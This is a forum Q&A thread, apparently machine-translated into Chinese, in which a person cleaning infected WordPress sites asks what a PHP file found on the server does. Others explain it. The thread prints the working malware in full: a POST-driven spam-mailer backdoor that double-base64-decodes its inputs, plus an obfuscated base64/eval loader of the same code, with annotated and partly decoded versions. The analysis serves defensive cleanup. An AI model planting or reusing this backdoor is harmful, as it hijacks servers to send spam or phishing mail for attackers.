所以我一直在用wordpress帮助那些在他们的godaddy服务器上遭受恶意软件困扰的人。我想我已经删除了导致问题的代码,但我只是好奇这个 php 在做什么,似乎它循环访问存储在 POST 中的变量并尝试解码任何信息,然后通过电子邮件发送它......有人可以帮助我理解这一点吗?干杯
<?php
$data = array('');
foreach ($_POST as $key => $value) {
array_push($data, $value);
}
$jxWnO = stripslashes(base64_decode(base64_decode($data[1] )));
$e2WPWta = stripslashes(base64_decode(base64_decode($data[2] )));
$hwrDZxfxhl = stripslashes(base64_decode(base64_decode($data[3] )));
$JQiQiWf3Pg = stripslashes(base64_decode(base64_decode($data[4] )));
$Fr2ZEIZYuKj = mail(stripslashes($jxWnO), stripslashes($e2WPWta), stripslashes($hwrDZxfxhl), stripslashes($JQiQiWf3Pg));
if ($Fr2ZEIZYuKj) {
echo $Fr2ZEIZYuKj;
} else {
echo '99';
}
?>
然后在一个单独的文件中:
<?php $code=base64_decode("XCRfZjJkZGFkYjBkZDUwNjdiODNjMjA0NDk2NmMwNDFiYWMgPSBhcnJheSgnJyk7IFx4NjZceDZGXHg3Mlx4NjVceDYxXHg2M1x4NjggKFwkXHg1Rlx4NTBceDRGXHg1M1x4NTQgYXMgXCRfN2Q1MDQ1ZTBmNTU5ODI4MzY4ODhiOGVmN2U4M2QzNzBlOTlmMjU4NGQxNzNhNmQ0MDRkNTQzNWQ1NWE3OGQ1NzBhNjk4ZWFhNDdmNDQ4NmJhNGVjYTg1MGJhMjgxMjQ3MmZkMjc0NmUzMzQ4MDI0NzY2ZWI5MzNlOTFjYTE5NWMgPT4gXCRfYzMxMGE5MGI0NjcxNGZhOTYzMzk0MTkwYjEyYThjNjFhYWFlNDk1Y2RhODE4ZTA5OWVkNmExYmUpIHtceDYxXHg3Mlx4NzJceDYxXHg3OVx4NUZceDcwXHg3NVx4NzNceDY4KFwkX2YyZGRhZGIwZGQ1MDY3YjgzYzIwNDQ5NjZjMDQxYmFjLCBcJF9jMzEwYTkwYjQ2NzE0ZmE5NjMzOTQxOTBiMTJhOGM2MWFhYWU0OTVjZGE4MThlMDk5ZWQ2YTFiZSk7fSBcJF9jNTNmOTg1NjJiYjM2M2RhNzE5YjBjNDQ2ZGQ4YzBhMTVjZWJmNDVhID0gXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFx4NjJceDYxXHg3M1x4NjVceDM2XHgzNFx4NUZceDY0XHg2NVx4NjNceDZGXHg2NFx4NjUoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShcJF9mMmRkYWRiMGRkNTA2N2I4M2MyMDQ0OTY2YzA0MWJhY1sxXSApKSk7IFwkXzhkMzQxZGM0ZjliZDM1YzdlOTQ1YmIxODJjM2Q0YzY4MjA0NTBhZWFmNGM2N2NmYThjYTkyZjBhOGFjOTI5MTEzZDdjZTRiYTA4NmE5ZGVmMzg5M2VlMjYwODgyNjUxOWFhYzI4YmIxZDM5NzZhMzZkZDU1NTBhMGVmZjdjNTYzID0gXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFx4NjJceDYxXHg3M1x4NjVceDM2XHgzNFx4NUZceDY0XHg2NVx4NjNceDZGXHg2NFx4NjUoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShcJF9mMmRkYWRiMGRkNTA2N2I4M2MyMDQ0OTY2YzA0MWJhY1syXSApKSk7IFwkX2RkYmU1ZDM5ID0gXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFx4NjJceDYxXHg3M1x4NjVceDM2XHgzNFx4NUZceDY0XHg2NVx4NjNceDZGXHg2NFx4NjUoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShcJF9mMmRkYWRiMGRkNTA2N2I4M2MyMDQ0OTY2YzA0MWJhY1szXSApKSk7IFwkXzAyMDNhYzU4NjU5YTllNTAxNDA4YjkxZGYyYzliNjFhMTFiM2EzODNiY2IzZGEwYmJmNTJhMTdiYTAwZDkwODggPSBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXHg2Mlx4NjFceDczXHg2NVx4MzZceDM0XHg1Rlx4NjRceDY1XHg2M1x4NkZceDY0XHg2NShceDYyXHg2MVx4NzNceDY1XHgzNlx4MzRceDVGXHg2NFx4NjVceDYzXHg2Rlx4NjRceDY1KFwkX2YyZGRhZGIwZGQ1MDY3YjgzYzIwNDQ5NjZjMDQxYmFjWzRdICkpKTsgXCRfOWUyYjE3Njk3NjcyNGFiZmU1YjI3NGYyNWQyM2UwNWExMTAwNmUyZDgzMTVjNTRiOWZkZTEyOTNjYWI2MmJiZSA9IFx4NkRceDYxXHg2OVx4NkMoXHg3M1x4NzRceDcyXHg2OVx4NzBceDczXHg2Q1x4NjFceDczXHg2OFx4NjVceDczKFwkX2M1M2Y5ODU2MmJiMzYzZGE3MTliMGM0NDZkZDhjMGExNWNlYmY0NWEpLCBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXCRfOGQzNDFkYzRmOWJkMzVjN2U5NDViYjE4MmMzZDRjNjgyMDQ1MGFlYWY0YzY3Y2ZhOGNhOTJmMGE4YWM5MjkxMTNkN2NlNGJhMDg2YTlkZWYzODkzZWUyNjA4ODI2NTE5YWFjMjhiYjFkMzk3NmEzNmRkNTU1MGEwZWZmN2M1NjMpLCBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXCRfZGRiZTVkMzkpLCBceDczXHg3NFx4NzJceDY5XHg3MFx4NzNceDZDXHg2MVx4NzNceDY4XHg2NVx4NzMoXCRfMDIwM2FjNTg2NTlhOWU1MDE0MDhiOTFkZjJjOWI2MWExMWIzYTM4M2JjYjNkYTBiYmY1MmExN2JhMDBkOTA4OCkpOyBceDY5XHg2NiAoXCRfOWUyYjE3Njk3NjcyNGFiZmU1YjI3NGYyNWQyM2UwNWExMTAwNmUyZDgzMTVjNTRiOWZkZTEyOTNjYWI2MmJiZSl7IFx4NjVceDYzXHg2OFx4NkYgXCRfOWUyYjE3Njk3NjcyNGFiZmU1YjI3NGYyNWQyM2UwNWExMTAwNmUyZDgzMTVjNTRiOWZkZTEyOTNjYWI2MmJiZTt9IGVsc2UgeyBceDY1XHg2M1x4NjhceDZGICdceDM5XHgzOSc7fQ=="); eval("return eval('"$code'");") ?>
重命名了变量以便于阅读...
<?php
$data = array('');
// Takes a post submitted to this url
foreach ($_POST as $key => $value) {
array_push($data, $value);
}
// For each post form field in the array it adds them to vars after decoding them twice.
$sVar1 = stripslashes(base64_decode(base64_decode($data[1] )));
$sVar2 = stripslashes(base64_decode(base64_decode($data[2] )));
$sVar3 = stripslashes(base64_decode(base64_decode($data[3] )));
$sVar4 = stripslashes(base64_decode(base64_decode($data[4] )));
// Then it emails the data submitted to the email contained in var1
// bool mail ( string $to , string $subject , string $message [, string $additional_headers [, string $additional_parameters ]] )
$sVar5 = mail(stripslashes($sVar1), stripslashes($sVar2), stripslashes($sVar3), stripslashes($sVar4));
// Outputs mail return function (success/error(99)) TRUE | FALSE
if ($sVar5) {
// If TRUE prints var5
echo $sVar5;
} else {
// If does not email successfully prints 99
echo '99';
}
这非常有趣 - 您能否扩展两个文件/代码片段如何相关并相互交互?
解码后,第二个脚本在混淆方面略有减少:
"'$var1 = array('');
'x66'x6F'x72'x65'x61'x63'x68 ('$'x5F'x50'x4F'x53'x54 as '$var2 => '$var3) {'x61'x72'x72'x61'x79'x5F'x70'x75'x73'x68('$var1, '$var3);}
'$var7 = 'x73'x74'x72'x69'x70'x73'x6C'x61'x73'x68'x65'x73('x62'x61'x73'x65'x36'x34'x5F'x64'x65'x63'x6F'x64'x65('x62'x61'x73'x65'x36'x34'x5F'x64'x65'x63'x6F'x64'x65('$var1[1] )));
'$var4 = 'x73'x74'x72'x69'x70'x73'x6C'x61'x73'x68'x65'x73('x62'x61'x73'x65'x36'x34'x5F'x64'x65'x63'x6F'x64'x65('x62'x61'x73'x65'x36'x34'x5F'x64'x65'x63'x6F'x64'x65('$var1[2] )));
'$var8 = 'x73'x74'x72'x69'x70'x73'x6C'x61'x73'x68'x65'x73('x62'x61'x73'x65'x36'x34'x5F'x64'x65'x63'x6F'x64'x65('x62'x61'x73'x65'x36'x34'x5F'x64'x65'x63'x6F'x64'x65('$var1[3] )));
'$var5 = 'x73'x74'x72'x69'x70'x73'x6C'x61'x73'x68'x65'x73('x62'x61'x73'x65'x36'x34'x5F'x64'x65'x63'x6F'x64'x65('x62'x61'x73'x65'x36'x34'x5F'x64'x65'x63'x6F'x64'x65('$var1[4] )));
'$var6 = 'x6D'x61'x69'x6C('x73'x74'x72'x69'x70'x73'x6C'x61'x73'x68'x65'x73('$var7), 'x73'x74'x72'x69'x70'x73'x6C'x61'x73'x68'x65'x73('$var4), 'x73'x74'x72'x69'x70'x73'x6C'x61'x73'x68'x65'x73('$var8), 'x73'x74'x72'x69'x70'x73'x6C'x61'x73'x68'x65'x73('$var5));
'x69'x66 ('$var6){ 'x65'x63'x68'x6F '$var6;} else { 'x65'x63'x68'x6F ''x39'x39';}"